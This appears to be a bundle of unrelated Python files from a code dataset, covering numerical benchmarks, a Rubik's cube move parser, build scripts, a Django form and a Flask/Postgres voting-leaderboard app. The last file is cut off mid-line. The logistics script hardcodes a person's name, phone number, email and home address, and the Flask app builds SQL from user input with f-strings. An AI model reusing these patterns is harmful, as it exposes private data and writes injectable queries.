np.zeros(N_source, dtype=complex)\n KAS(px, py, tau, out=self_reference_eval)\n time_self_eval = (time.time() - st)*1000\n st = time.time()\n target_reference_eval = np.zeros(N_target, dtype=complex)\n KA(px, py, rx, ry, tau, out=target_reference_eval)\n time_target_eval = (time.time() - st)*1000\n print('\\nDirect self evaluation took: {:0.1f}'.format(time_self_eval))\n print('Direct target evaluation took: {:0.1f}'.format(time_target_eval))\n else:\n # by FMMLIB2D, if available\n try:\n import pyfmmlib2d\n source = np.row_stack([px, py])\n target = np.row_stack([rx, ry])\n dumb_targ = np.row_stack([np.array([0.6, 0.6]), np.array([0.5, 0.5])])\n st = time.time()\n out = pyfmmlib2d.HFMM(source, dumb_targ, charge=tau, compute_target_potential=True, helmholtz_parameter=helmholtz_k)\n tform = time.time() - st\n print('FMMLIB generation took: {:0.1f}'.format(tform*1000))\n print('...Points/Second/Core (thousands) \\033[1m', int(N_source/tform/cpu_num/1000), '\\033[0m ')\n st = time.time()\n out = pyfmmlib2d.HFMM(source, charge=tau, compute_source_potential=True, helmholtz_parameter=helmholtz_k)\n self_reference_eval = out['source']['u']\n tt = time.time() - st - tform\n print('FMMLIB self only eval took: {:0.1f}'.format(tt*1000))\n print('...Points/Second/Core (thousands) \\033[1m', int(N_source/tt/cpu_num/1000), '\\033[0m ')\n st = time.time()\n out = pyfmmlib2d.HFMM(source, target, charge=tau, compute_target_potential=True, helmholtz_parameter=helmholtz_k)\n target_reference_eval = out['target']['u']\n tt = time.time() - st - tform\n print('FMMLIB target only eval took: {:0.1f}'.format(tt*1000))\n print('...Points/Second/Core (thousands) \\033[1m', int(N_target/tt/cpu_num/1000), '\\033[0m ')\n except:\n print('')\n reference = False\n\n# do my FMM (once first, to compile functions...)\nFMM = fmm.FMM(px, py, kernel_functions, numba_functions_otf, N_equiv, N_cutoff, True)\nFMM.precompute()\nFMM.build_expansions(tau)\n_ = FMM.evaluate_to_points(px, py, True)\n\nst = time.time()\nprint('')\nFMM = fmm.FMM(px, py, kernel_functions, numba_functions_otf, N_equiv, N_cutoff, True)\nFMM.precompute()\nprint('pyfmmlib2d precompute took: {:0.1f}'.format((time.time()-st)*1000))\nst = time.time()\nFMM.build_expansions(tau)\ntt = (time.time()-st)\nprint('pyfmmlib2d generation took: {:0.1f}'.format(tt*1000))\nprint('...Points/Second/Core (thousands) \\033[1m', int(N_source/tt/cpu_num/1000), '\\033[0m ')\nst = time.time()\nself_fmm_eval = FMM.evaluate_to_points(px, py, True)\ntt = (time.time()-st)\nprint('pyfmmlib2d source eval took: {:0.1f}'.format(tt*1000))\nprint('...Points/Second/Core (thousands) \\033[1m', int(N_source/tt/cpu_num/1000), '\\033[0m ')\n\nst = time.time()\ntarget_fmm_eval = FMM.evaluate_to_points(rx, ry)\ntt = (time.time()-st)\nprint('pyfmmlib2d target eval took: {:0.1f}'.format(tt*1000))\nprint('...Points/Second/Core (thousands) \\033[1m', int(N_target/tt/cpu_num/1000), '\\033[0m ')\n\nif reference:\n scale = np.abs(self_reference_eval).max()\n self_err = np.abs(self_fmm_eval - self_reference_eval)/scale\n target_err = np.abs(target_fmm_eval - target_reference_eval)/scale\n print('\\nMaximum difference, self: {:0.2e}'.format(self_err.max()))\n print('Maximum difference, target: {:0.2e}'.format(target_err.max()))\n\nif False:\n # plan fmm\n st = time.time()\n fmm_plan = pykifmm2d.fmm.fmm_planner(px, py, N_equiv, N_cutoff, kernel_functions, numba_functions_plan, verbose=True)\n planning_time = (time.time()-st)*1000\n # execute fmm\n st = time.time()\n fmm_eval = pykifmm2d.fmm.planned_fmm(fmm_plan, tau)\n time_fmm_eval = (time.time() - st)*1000\n err = np.abs(fmm_eval - reference_eval)\n\n print('\\nFMM planning took: {:0.1f}'.format(planning_time))\n print('FMM evaluation took: {:0.1f}'.format(time_fmm_eval))\n print('Maximum difference: {:0.2e}'.format(err.max()))\n\n","sub_path":"examples/hankel.py","file_name":"hankel.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"225964809","text":"#recursive function that returns the reverse of the string with the symbol '|' on the right side of the letter (except the last one)\ndef reverse_string(string):\n string = list(string)\n s = len(string) # length of the string\n s0 = string[0] # first letter of the string\n\n if s == 1: # base code\n return string # if the string has only 1 letter, return the string itself\n\n else: # else\n # the function calls itself and adds in the end the first letter of the string\n return reverse_string(string[1:]) + ['|'] + [s0]\n\nprint(reverse_string('GMIT'))\n","sub_path":"reverse_string.py","file_name":"reverse_string.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"379069654","text":"import re\n\nmove_offsets = (\"\", \"2\", \"'\")\nmove_dirs = \"uUlLfFrRbBdDMES\"\nmove_rots = \"xyz\"\nmove_others = \"34w2'\"\nmove_valid_chars = move_dirs + move_rots + move_others\n\ndef is_valid_move(move):\n # Check all chars in move string are valid possible moves\n if len(move) == 0:\n return False\n if not all(ch in move_valid_chars for ch in move):\n return False\n\n # Wide turn with more than 2 layers\n if move[0].isdigit():\n # 2 or less layer turns do not require a number \n if move[0] in \"012\":\n return False\n # If a number is present, must use \"w\" to signal a wide turn\n if len(move) < 3 or move[2] != 'w':\n return False\n move = move[1:]\n\n # Check that the directional indicator is valid\n if len(move) == 0 or move[0] not in move_dirs:\n return False\n move_dir = move[0]\n move = move[1:]\n\n # Remaining suffixes are \"'\", \"2\" possibly with w before\n if move_dir not in \"ULFRBD\":\n if len(move) != 0 and move[0] not in move_offsets:\n return False\n elif len(move) != 0:\n move = move[1:]\n else:\n if len(move) != 0 and move[0] == 'w':\n move = move[1:]\n\n # Remaining part should be a move offset\n return move in move_offsets\n\ndef is_commutator(comm):\n return ',' in comm or '/' in comm or '*' in comm or ':' in comm\n\ndef get_move_split_idx(move):\n idx = 0\n while idx < len(move) and move[idx] in move_valid_chars[:-2]:\n idx += 1\n return idx\n\ndef inverse_move(move):\n if len(move) > 2:\n move = move[:2]\n idx = get_move_split_idx(move)\n base = move[:idx]\n offset = move[idx:]\n return base + move_offsets[2-move_offsets.index(offset)]\n\ndef cancel_moves(move1, move2):\n idx1 = get_move_split_idx(move1)\n idx2 = get_move_split_idx(move2)\n\n base1 = move1[:idx1]\n base2 = move2[:idx2]\n if base1 != base2:\n return (False, move2)\n\n offset1 = move1[idx1:]\n offset2 = move2[idx2:]\n\n net_offset = (move_offsets.index(offset1) + move_offsets.index(offset2) + 2) % 4\n if net_offset == 0:\n return (True, None)\n else:\n return (True, base1 + move_offsets[net_offset-1])\n\ndef cancel_str(move_list):\n out_list = [move_list[0]]\n\n for i in range(1, len(move_list)):\n pop_prev, add_next = cancel_moves(move_list[i-1], move_list[i])\n if pop_prev:\n if len(out_list) > 0:\n out_list.pop()\n if add_next is not None:\n out_list.append(add_next)\n\n return out_list\n\ndef inverse_moves(move_str):\n move_str = move_str.split()\n return ' '.join(reversed([inverse_move(move) for move in move_str]))\n\ndef comm_to_moves(comm):\n if not is_commutator(comm):\n return comm\n\n # replace apostrophe\n comm = comm.replace(\"’\", \"'\")\n\n comm = comm.replace('[', '').replace(']', '')\n comm = comm.replace('(', '').replace(')', '')\n comm = comm.replace('{', '').replace('}', '').strip()\n has_mul = False\n if '*' in comm:\n comm = comm[:comm.index('*')]\n has_mul = True\n has_setup = ':' in comm\n comm_list = [x.strip() for x in re.split(':|,|/', comm)]\n if len(comm_list) == 0:\n return \"\"\n\n move_str = \"\"\n if ',' in comm:\n move_str = comm_list[-2] + ' ' + comm_list[-1] + ' ' + inverse_moves(comm_list[-2]) + ' ' + inverse_moves(comm_list[-1])\n elif '/' in comm:\n move_str = comm_list[-2] + ' ' + comm_list[-1] + ' ' + comm_list[-2][0] + '2 ' + inverse_moves(comm_list[-1]) + ' ' + comm_list[-2]\n elif has_mul: \n move_str = comm_list[-1] + ' ' + comm_list[-1]\n else: \n move_str = comm_list[-1]\n if has_setup:\n move_str = comm_list[0] + ' ' + move_str + ' ' + inverse_moves(comm_list[0])\n\n # change 2' to 2 \n move_str = move_str.replace(\"2'\", \"2\")\n move_list = move_str.split()\n\n out_list = cancel_str(move_list)\n for _ in range(len(out_list)):\n out_list = cancel_str(out_list)\n\n return ' '.join(out_list)\n\ndef inverse_comm(comm):\n if not is_commutator(comm):\n return comm\n\n add_sq_brackets = '[' in comm and ']' in comm\n # left and right brackets\n lbr = '[' if add_sq_brackets else ''\n rbr = ']' if add_sq_brackets else ''\n\n # replace apostrophe\n comm = comm.replace(\"’\", \"'\")\n\n comm = comm.replace('[', '').replace(']', '')\n comm = comm.replace('(', '').replace(')', '')\n comm = comm.replace('{', '').replace('}', '').strip()\n has_mul = False\n if '*' in comm:\n comm = comm[:comm.index('*')]\n has_mul = True\n has_setup = ':' in comm\n comm_list = [x.strip() for x in re.split(':|,|/', comm)]\n if len(comm_list) == 0:\n return \"\"\n\n move_str = \"\"\n if ',' in comm:\n move_str = lbr + comm_list[-1] + ', ' + comm_list[-2] + rbr\n elif '/' in comm:\n move_str = '{' + f\"{inverse_moves(comm_list[-2])}/{comm_list[-1]}\" + '}'\n elif has_mul: \n move_str = (f\"({inverse_moves(comm_list[-1])}) * 2\")\n else: \n move_str = comm_list[-1]\n if has_setup:\n move_str = lbr + comm_list[0] + ': ' + move_str + rbr\n\n return move_str\n\ndef get_comm_parts(comm):\n if not is_commutator(comm):\n return comm\n\n parts = {\n 'setup': \"\",\n 'insertion': \"\",\n 'interchange': \"\",\n }\n\n comm = comm.replace(\"’\", \"'\")\n comm = comm.replace('[', '').replace(']', '')\n comm = comm.replace('(', '').replace(')', '')\n comm = comm.replace('{', '').replace('}', '').strip()\n\n has_setup = ':' in comm\n comm_list = [x.strip() for x in re.split(':|,|/', comm)]\n if len(comm_list) == 0:\n return parts\n\n parts['interchange'] = comm_list[-1] if len(comm_list[-1]) < len(comm_list[-2]) else comm_list[-2]\n parts['insertion'] = comm_list[-1] if len(comm_list[-1]) > len(comm_list[-2]) else comm_list[-2]\n if has_setup:\n setup = comm_list[0]\n\n return parts\n \n\n\nif __name__ == \"__main__\":\n \"\"\"\n comm = input()\n print(comm_to_moves(comm))\n print(inverse_comm(comm))\n \"\"\"\n\n # multiple inputs\n comms = []\n while True:\n try:\n line = input()\n except EOFError:\n break\n comms.append(line)\n\n print()\n print()\n print(\"==============================\")\n for comm in comms:\n #print(comm_to_moves(comm))\n print(inverse_comm(comm))","sub_path":"cube_moves.py","file_name":"cube_moves.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"480042820","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : API_logistics_createOrder.py\n@Time : 2020-07-28 10:59\n@Author : Forest\n@Email : 17349766478@163.com\n@Software: PyCharm\n\"\"\"\ndef logistics_createOrder():\n import re,os\n import requests,time\n import json\n from config.config import HOSTL,sessionfile,logst\n from Lib.Get_read_Excel import read_file\n from Lib.Write_Excel import write_manage\n session = read_file(sessionfile)\n url = f\"{HOSTL}/sample/api/logistics/createOrder\"\n timenum = int(time.time())\n payload = {\n \"startContactName\":\"朱森林\",\n \"startContactPhone\":\"17349766478\",\n \"startStationAddress\":\"上海市松江区泗泾镇鼓楼公路1899弄36号801室,来的时候请提前打我电话或者在门卫门口等我\",\n \"orderEtd\":timenum,\n \"sampleIds\":\"3\"\n }\n headers = {\n 'Content-Type': \"application/json\",\n 'sessionId': session,\n }\n\n response = requests.request(\"POST\", url, data=json.dumps(payload), headers=headers)\n # print(response.json())\n if response.json()['code'] == 0:\n logisticsid = response.json()['data']['logisticsId']\n write_manage(logst,str(logisticsid))\n print('创建物流订单成功,物流号为:%s'%(logisticsid))\n else:\n print('重复下单,请先去取消订单')\n os._exit(0)\n print(logisticsid)\n import time\n print(int(time.time()))","sub_path":"ShuoShiJianKang/Lib/logistics/API_logistics_createOrder.py","file_name":"API_logistics_createOrder.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"642765319","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport os\n\nimport sqlite3\nfrom gcwatcher.cache import Cache\n\n__all__ = []\n\n\nclass Db:\n def __init__(self, dbFile):\n self.dbFile = dbFile\n self.conn = sqlite3.connect(dbFile)\n\n def init(self):\n self.conn.execute('''CREATE TABLE if not exists caches\n (id INT,\n gccode TEXT,\n guid TEXT,\n wpid INT,\n name TEXT,\n listing TEXT,\n hint TEXT,\n owner TEXT,\n lat REAL,\n lon REAL,\n difficulty REAL,\n terrain REAL,\n size REAL,\n updated timestamp)''')\n\n self.conn.execute('''CREATE TABLE if not exists cachedata\n (id INT,\n cacheid INT,\n key TEXT,\n lang TEXT,\n value TEXT,\n updated timestamp)''')\n\n self.conn.execute('''CREATE TABLE if not exists logs\n (id INT,\n cacheid INT,\n cacherid INT,\n value TEXT,\n updated timestamp)''')\n\n self.conn.execute('''CREATE TABLE if not exists cachers\n (id TEXT,\n guid TEXT,\n name TEXT,\n updated timestamp)''')\n\n def updateRecord(self, cache):\n r = (cache.getGcCode(),)\n found = self.conn.execute('SELECT * FROM caches where gccode = ?', r)\n\n r = (cache.getGUID(), cache.getName(), cache.getLat(), cache.getLon(), cache.getDifficulty(), cache.getTerrain(), cache.getSize(), cache.getGcCode())\n if next(found, None):\n self.conn.execute(\"UPDATE caches SET guid=?, name=?, lat=?, lon=?, difficulty=?, terrain=?, size=?, updated=datetime('now') WHERE gccode = ?\", r)\n else:\n self.conn.execute(\"INSERT INTO caches (guid, name, lat, lon, difficuty, terrain, size, gccode, updated) VALUES (\" + \",\".join('?'*len(r)) + \", datetime('now'))\", r)\n\n def getCacheByGccode(self, gccode):\n r = (gccode, )\n it = self.conn.execute(\"SELECT * FROM caches WHERE gccode = ?\", r)\n row = next(it, None)\n result = None\n if (row):\n result = Cache()\n return result\n\n def getCacheByGuid(self, guid):\n r = (guid, )\n it = self.conn.execute(\"SELECT * FROM caches WHERE guid = ?\", r)\n row = next(it, None)\n result = None\n if (row):\n result = Cache()\n return result\n\n def cacheExists(self, wp = None, guid = None):\n if wp:\n return (self.getCacheByGccode(wp) != None)\n elif guid:\n return (self.getCacheByGuid(guid) != None)\n\n raise Exception('cacheExists: missing argumens')\n\n def commit(self):\n self.conn.commit()\n\n def close(self):\n self.commit()\n self.conn.close()\n\n\nif __name__ == '__main__':\n\n os.remove('tmp/test.db')\n db = Db('tmp/test.db')\n\n db.init()\n cache = Cache(\"GC123\", \"000-000\", \"test cache\")\n db.updateRecord(cache)\n\n cache.setLat(\"50.099\")\n cache.setLon(\"15.999\")\n db.updateRecord(cache)\n db.commit()\n db.close()\n","sub_path":"gcwatcher/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"278234946","text":"import functools\nimport glob\nimport subprocess\n\nimport nox\n\nLINT_ITEMS = \"nox.py\", \"docs/source/conf.py\", \"zazo\", \"tests\"\n\n\n@nox.session\ndef docs(session):\n session.install(\"-r\", \"tools/reqs/docs.txt\")\n\n session.run(\"sphinx-build\", \"-n\", \"-b\", \"html\", \"docs/source\", \"docs/build\")\n\n\n@nox.session\ndef packaging(session):\n session.install(\"-r\", \"tools/reqs/packaging.txt\")\n\n session.run(\"flit\", \"build\")\n\n\ndef lint_session(func):\n\n @functools.wraps(func)\n def wrapped(session):\n if session.posargs:\n files = session.posargs\n else:\n files = LINT_ITEMS\n session.install(\"--pre\", \"-r\", \"tools/reqs/lint.txt\")\n\n session.run(\"black\", \"--version\")\n session.run(\"isort\", \"--version\")\n session.run(\"mypy\", \"--version\")\n\n return func(session, files)\n\n return wrapped\n\n\n@nox.session\n@lint_session\ndef lint(session, files):\n session.run(\"black\", \"--check\", *files)\n session.run(\"isort\", \"--check-only\", \"--diff\", \"--recursive\", *files)\n session.run(\"mypy\", \"--ignore-missing-imports\", \"--check-untyped-defs\", \"zazo\")\n session.run(\n \"mypy\", \"-2\", \"--ignore-missing-imports\", \"--check-untyped-defs\", \"zazo\"\n )\n\n\n@nox.session\n@lint_session\ndef lint_format(session, files):\n session.run(\"black\", *files)\n session.run(\"isort\", \"--recursive\", *files)\n\n\n@nox.session\n@nox.parametrize(\"python_version\", [\"2.7\", \"3.4\", \"3.5\", \"3.6\", \"3.7\", \"pypy\", \"pypy3\"])\ndef test(session, python_version):\n # Set the interpreter\n if python_version.startswith(\"pypy\"):\n session.interpreter = python_version\n else:\n session.interpreter = \"python\" + python_version\n\n # Build the package.\n # THIS IS A HACK\n # Working around all kinds of weird nox + flit + Travis CI behavior.\n # We're building a wheel here and installing it with session.install since\n # nox is declarative but we need to run the build command before executing\n # code.\n def my_run(*args):\n print(\"run > \" + \" \".join(args))\n try:\n subprocess.check_call(args)\n except subprocess.CalledProcessError:\n session.error(\"Command failed.\")\n\n my_run(\"python3\", \"-m\", \"flit\", \"build\")\n files = glob.glob(\"./dist/*.whl\")\n if not files:\n session.error(\"Could not find any built wheels.\")\n\n # Install the package and test dependencies.\n session.install(*files)\n session.install(\"-r\", \"tools/reqs/test.txt\")\n\n # Run the tests\n session.cd(\"tests\") # we change directory to avoid the cwd ambiguity\n session.run(\"pytest\", *session.posargs)\n","sub_path":"nox.py","file_name":"nox.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"536296972","text":"from point import point\nfrom kd_tree import kd_tree\nfrom graph import myGraph\n \ndef driver1():\n obj = kd_tree(2)\n arr = []\n cid = 0\n for i in range(0,10):\n for j in range(0,10):\n arr.append(point(name=cid, dim=2, coordinate=[i,j]))\n cid += 1\n swap = myGraph(2)\n for i in arr:\n t = swap.insertNode(i, key=i.name, cost=0)\n\n t = swap.k_center_main(10,2)\n swap.plot()\n\n\ndef driver2():\n obj = kd_tree(3)\n arr = []\n cid = 0\n for i in range(0,15):\n for j in range(0,15):\n for k in range(0,15):\n arr.append(point(name=cid, dim=3, coordinate=[i,j,k]))\n cid += 1\n swap = myGraph(3)\n for i in arr:\n t = swap.insertNode(i, key=i.name, cost=0)\n input(\"ABOUT TO CALL K CENTER\")\n t = swap.k_center_main(100,10)\n print(\"k_center complete\")\n swap.plot3()\n\n\ndriver1()\ninput(\"\")\n","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"649999330","text":"from django.forms import ModelForm\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit, Layout, Field, Div, Fieldset\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .models import Rsvp\n\n\nclass RsvpForm(ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-xs-12 col-sm-4 col-md-4'\n self.helper.field_class = 'col-xs-12 col-sm-8 col-md-8'\n self.helper.layout = Layout(\n Fieldset(\n 'OSA formulär',\n 'name',\n 'email',\n 'telephone_number',\n 'food_preference',\n Div(\n 'next_day',\n Submit('submit', _('Submit')),\n css_class='col-sm-offset-4',\n ),\n )\n )\n\n class Meta:\n model = Rsvp\n","sub_path":"RsvpForm/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"608019502","text":"import math\nimport xboa.common\n\nclass PzCalculator(object):\n def __init__(self, config):\n self.config = config\n self.c_light = xboa.common.constants[\"c_light\"]\n self.mass = xboa.common.pdg_pid_to_mass[13]\n\n def get_separation_z(self, event, z):\n tku = event[\"data_in\"]\n tkd = event[\"data_out\"]\n rx = (tku[0] + tku[1]*(z-self.config.z_tku)) - \\\n (tkd[0] + tkd[1]*(z-self.config.z_tkd))\n ry = (tku[2] + tku[3]*(z-self.config.z_tku)) - \\\n (tkd[2] + tkd[3]*(z-self.config.z_tkd))\n r = (rx**2 + ry**2)**0.5\n return r\n\n def get_path_length(self, event):\n tku = event[\"data_in\"]\n tkd = event[\"data_out\"]\n ptu = (tku[1]**2 + tku[3]**2)**0.5\n zu = self.config.z_fc-self.config.z_tof1\n path_length_u = zu/math.cos(math.atan(ptu))\n\n ptd = (tkd[1]**2 + tkd[3]**2)**0.5\n zd = self.config.z_tof2 - self.config.z_fc\n path_length_d = zd/math.cos(math.atan(ptd))\n\n path_length = path_length_u + path_length_d\n return path_length\n\n def get_p_tot(self, event):\n if event[\"data_in\"] == None or event[\"data_out\"] == None or event[\"tof12\"] == None:\n return None, None, None\n path_length = self.get_path_length(event)\n beta = path_length/(event[\"tof12\"])/self.c_light\n if beta >= 1 or beta < 0:\n return None, None, None\n gamma = 1/(1-beta**2)**0.5\n p_tot = self.mass*beta*gamma\n miss_distance = self.get_separation_z(event, self.config.z_fc)\n return p_tot, path_length, miss_distance\n\n","sub_path":"scripts/old/pz_calculator.py","file_name":"pz_calculator.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"618239131","text":" \r\nimport os\r\nimport psycopg2\r\nimport datetime\r\nfrom flask import Flask, render_template,request,redirect,url_for\r\nimport json\r\nimport requests\r\nimport sqlite3 as sql\r\n\r\nbot_programming = \"fantastic-bits\"\r\nDATABASE_URL = os.environ['DATABASE_URL']\r\napp = Flask(__name__)\r\ninfo = []\r\nfirst = []\r\nfinal = []\r\n\r\ndef bot_programming_getter():\r\n a=[\"fantastic-bits\",\"tulips-and-daisies\",\"a-code-of-ice-and-fire\"]\r\n winner=[0,0,0]\r\n votes=retrievevote()\r\n for v in votes:\r\n v=v[0]\r\n for b in range(len(a)):\r\n if v == a[b]:\r\n vo=b\r\n winner[vo] += 1\r\n print(winner)\r\n m=-1\r\n for c in range(len(winner)):\r\n b=winner[c]\r\n if b > m:\r\n m=b\r\n ret=a[c]\r\n return ret\r\n\r\ndef check_time(tn):\r\n date = 10\r\n month = 10\r\n hour = 5\r\n minute = 0\r\n date_today = int(tn.strftime(\"%d\"))\r\n month_now = int(tn.strftime(\"%m\"))\r\n hour_now = int(tn.strftime(\"%H\"))\r\n minute_now = int(tn.strftime(\"%M\"))\r\n date+=month*30\r\n hour+=date*24\r\n minute+=hour*60\r\n date_today+=month_now*30\r\n hour_now+=date_today*24\r\n minute_now+=hour_now*60\r\n if minute <= minute_now and int(tn.strftime(\"%y\")) == 20:\r\n return True\r\n return False\r\n\r\ndef check_end_time(tn):\r\n date = 20\r\n month = 10\r\n hour = 5\r\n minute = 0\r\n date_today = int(tn.strftime(\"%d\"))\r\n month_now = int(tn.strftime(\"%m\"))\r\n hour_now = int(tn.strftime(\"%H\"))\r\n minute_now = int(tn.strftime(\"%M\"))\r\n date+=month*30\r\n hour+=date*24\r\n minute+=hour*60\r\n date_today+=month_now*30\r\n hour_now+=date_today*24\r\n minute_now+=hour_now*60\r\n if minute <= minute_now and int(tn.strftime(\"%y\")) == 20:\r\n return True\r\n return False\r\n\r\ndef check_re_time(tn):\r\n date = 15\r\n month = 10\r\n hour = 5\r\n minute = 0\r\n date_today = int(tn.strftime(\"%d\"))\r\n month_now = int(tn.strftime(\"%m\"))\r\n hour_now = int(tn.strftime(\"%H\"))\r\n minute_now = int(tn.strftime(\"%M\"))\r\n date+=month*30\r\n hour+=date*24\r\n minute+=hour*60\r\n date_today+=month_now*30\r\n hour_now+=date_today*24\r\n minute_now+=hour_now*60\r\n if minute <= minute_now and int(tn.strftime(\"%y\")) == 20:\r\n return True\r\n return False\r\n\r\ndef get_rankings(bot):\r\n Leaderboard=[]\r\n leagues = [\"legend\",\"gold\",\"silver\",\"bronze\",\"wood1\",\"wood2\",\"wood3\"]\r\n for name in leagues:\r\n try:\r\n cg = requests.post('https://www.codingame.com/services/Leaderboards/getFilteredPuzzleLeaderboard',json = [bot,\"c96627d7b482084183f526c125ae497b\",\"global\",{\"active\":True,\"column\":\"LEAGUE\",\"filter\":name}]) \r\n Leaderboard.extend(cg.json()['users'])\r\n except:\r\n pass\r\n return Leaderboard\r\n\r\ndef str_leaderboard():\r\n bot_programming=bot_programming_getter()\r\n leda=get_rankings(bot_programming)\r\n a=\"\"\r\n for i in leda:\r\n try:\r\n a+=str(i['pseudo'])+\"|\"+str(i['rank'])+\" \"\r\n except:\r\n pass\r\n a=a[:-1]\r\n return a\r\n\r\ndef update_first():\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n l=str_leaderboard()\r\n sqlite_insert_with_param = f\"UPDATE initial_rank SET leaderboard = '{l}' WHERE id = 'a';\"\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n\r\ndef update_final(save):\r\n a=\"\"\r\n for i in save:\r\n for k in i:\r\n a+=str(k)+\"|\"\r\n a=a[:-1]\r\n a+=\" \"\r\n a=a[:-1]\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n sqlite_insert_with_param=f\"UPDATE final_rank SET leaderboard = '{a}' WHERE id='a';\"\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n\r\ndef createfirstleaderboard():\r\n print(\"creating table\")\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n cur.execute(\"CREATE TABLE initial_rank(id TEXT,leaderboard TEXT)\")\r\n print(\"created table\")\r\n con.commit()\r\n cur=con.cursor()\r\n l=str_leaderboard()\r\n sqlite_insert_with_param = f\"INSERT INTO initial_rank(id,leaderboard) VALUES ('a','{l}');\"\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n\r\ndef createfinalleaderboard():\r\n print(\"creating table\")\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n cur.execute(\"CREATE TABLE final_rank(id TEXT,leaderboard TEXT)\")\r\n con.commit()\r\n print(\"created table\")\r\n cur=con.cursor()\r\n sqlite_insert_with_param = f\"INSERT INTO final_rank(id,leaderboard) VALUES ('a','a');\"\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n\r\ndef get_final():\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n cur.execute(\"SELECT leaderboard FROM final_rank\")\r\n a=cur.fetchall()\r\n a=a[0]\r\n a=a[0]\r\n s=a.split()\r\n r=[]\r\n for i in s:\r\n r.append(i.split(\"|\"))\r\n return r\r\n\r\ndef createvoterlist():\r\n print(\"creating table\")\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n table=\"\"\"\r\n CREATE TABLE vote (\r\n name TEXT\r\n )\r\n \"\"\"\r\n cur.execute(table)\r\n con.commit()\r\n print(\"created table\")\r\n\r\ndef insertvote(vote):\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n sqlite_insert_with_param = f\"INSERT INTO vote(name) VALUES ('{vote}');\"\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n con.close()\r\n\r\ndef retrievevote():\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n cur.execute(\"SELECT name FROM vote\")\r\n users = cur.fetchall()\r\n con.close()\r\n return users\r\n\r\ndef createtable():\r\n print(\"creating table\")\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur=con.cursor()\r\n table=\"\"\"\r\n CREATE TABLE Participa (\r\n name TEXT\r\n )\r\n \"\"\"\r\n cur.execute(table)\r\n con.commit()\r\n print(\"created table\")\r\n\r\ndef insertUser(nam):\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n sqlite_insert_with_param = f\"INSERT INTO Participa(name) VALUES ('{nam}');\"\r\n print(sqlite_insert_with_param)\r\n cur.execute(sqlite_insert_with_param)\r\n con.commit()\r\n con.close()\r\n\r\ndef retrieveUsers():\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n cur.execute(\"SELECT name FROM Participa\")\r\n users = cur.fetchall()\r\n con.close()\r\n return users\r\n\r\ndef initial_rank(user,curr_leaderboard):\r\n con = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n cur = con.cursor()\r\n cur.execute(\"SELECT leaderboard FROM initial_rank\")\r\n l = cur.fetchall()\r\n con.close()\r\n l=l[0]\r\n l=l[0]\r\n l=l.split()\r\n for p in l:\r\n p=p.split(\"|\")\r\n if p[0] == user:\r\n return int(p[1])\r\n return len(curr_leaderboard)\r\n\r\ndef scrape_data(part):\r\n global info\r\n participants=[]\r\n for n in part:\r\n participants.append(n[0])\r\n info=[]\r\n data=[]\r\n leagueFinder = {0:'wood 2', 1:'wood 1', 2:'bronze', 3:'silver', 4:'gold', 5:'legend'}\r\n bot_programming=bot_programming_getter()\r\n print(bot_programming)\r\n if bot_programming == \"a-code-of-ice-and-fire\":\r\n leagueFinder = {0:'wood 3', 1:'wood 2', 2:'wood 1', 3:'bronze', 4:'silver', 5:'gold',6:'legend'}\r\n leaderboard=get_rankings(bot_programming)\r\n if check_time(datetime.datetime.now()) == False:\r\n update_first()\r\n for cgdata in leaderboard:\r\n try:\r\n if (cgdata['pseudo'] in participants or cgdata['pseudo'].lower() in participants) and cgdata['pseudo'] != \"aaaa111\":\r\n username = cgdata['pseudo']\r\n cgrank = cgdata['rank']\r\n lerank = cgdata['localRank']\r\n points = 